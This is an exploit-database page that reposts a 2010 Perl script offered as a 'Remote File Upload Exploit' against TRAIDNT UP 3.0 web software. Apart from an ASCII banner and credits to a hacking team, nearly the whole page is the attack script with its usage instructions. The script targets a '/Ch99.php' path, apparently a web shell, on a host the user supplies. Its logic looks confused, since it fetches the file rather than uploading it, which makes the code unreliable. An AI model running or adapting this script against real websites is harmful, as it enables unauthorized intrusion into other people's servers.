Home / os / win7

[webapps / 0day] - TRAIDNT UP Version 3.0 Remote File Upload

Posted on 25 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>TRAIDNT UP Version 3.0 Remote File Upload Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 25 Sep 2010 | Exploit category: webapps / 0day | Exploit author: indoushka | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>#!/usr/bin/perl -w # # TRAIDNT UP Version 3.0 Remote File Upload Exploit # # Found &amp; Coded: indoushka # # Date: 25/07/2010 # # Home: www.sec4ever.com # # Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel # special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller # Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net # MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH # # Download : http://traidnt.net/ use LWP::Simple; use LWP::UserAgent; system(&#039;cls&#039;); system(&#039;title TRAIDNT UP Version 3.0 Remote File Upload Exploit&#039;); system(&#039;color a&#039;); if(@ARGV &lt; 2) { print &quot;[-]How To Use &quot;; &amp;help; exit(); } sub help() { print &quot;[+] usage1 : perl $0 site.com /path/ &quot;; print &quot;[+] usage2 : perl $0 localhost / &quot;; } print &quot; ************************************************************************ &quot;; print &quot; 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 &quot;; print &quot; _ __ __ __ 1 &quot;; print &quot;1 /&#039; __ /&#039;__` / \__ /&#039;__` 0 &quot;; print &quot; /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 &quot;; print &quot;1 /_/ /&#039; _ ` / /_/_\_&lt;_ /&#039;___ / /`&#039;__ 0 &quot;; print &quot; / / / / \__/ \_ \_ / 1 &quot;; print &quot;1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 &quot;; print &quot; /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 &quot;; print &quot;1 \____/ &gt;&gt; Exploit database separated by exploit 0 &quot;; print &quot; /___/ type (local, remote, DoS, etc.) 1 &quot;; print &quot;1 1 &quot;; print &quot; [+] Site : Inj3ct0r.com 0 &quot;; print &quot;1 [+] Support e-mail : submit[at]inj3ct0r.com 1 &quot;; print &quot; 0 &quot;; print &quot;1 ####################################### 1 &quot;; print &quot; I&#039;m indoushka member from Inj3ct0r Team 1 &quot;; print &quot;1 ####################################### 0 &quot;; print &quot;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 &quot;; ($TargetIP, $path, $File,) = @ARGV; $File=&quot;/Ch99.php&quot;; my $url = &quot;http://&quot; . $TargetIP . $path . $File; print &quot; wait!!! &quot;; my $useragent = LWP::UserAgent-&gt;new(); my $request = $useragent-&gt;get($url,&quot;:content_file&quot; =&gt; &quot;C:/AppServ/www/upload/admin/ch99.php&quot;); if ($request-&gt;is_success) { print &quot;[+] $url Exploited! &quot;; print &quot;[+] File saved to C:/AppServ/www/upload/admin/ch99.php &quot;; exit(); } else { print &quot;[!] Exploiting $url Failed ! [!] &quot;.$request-&gt;status_line.&quot; &quot;; exit(); } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-25]</pre></body></html>

 

TOP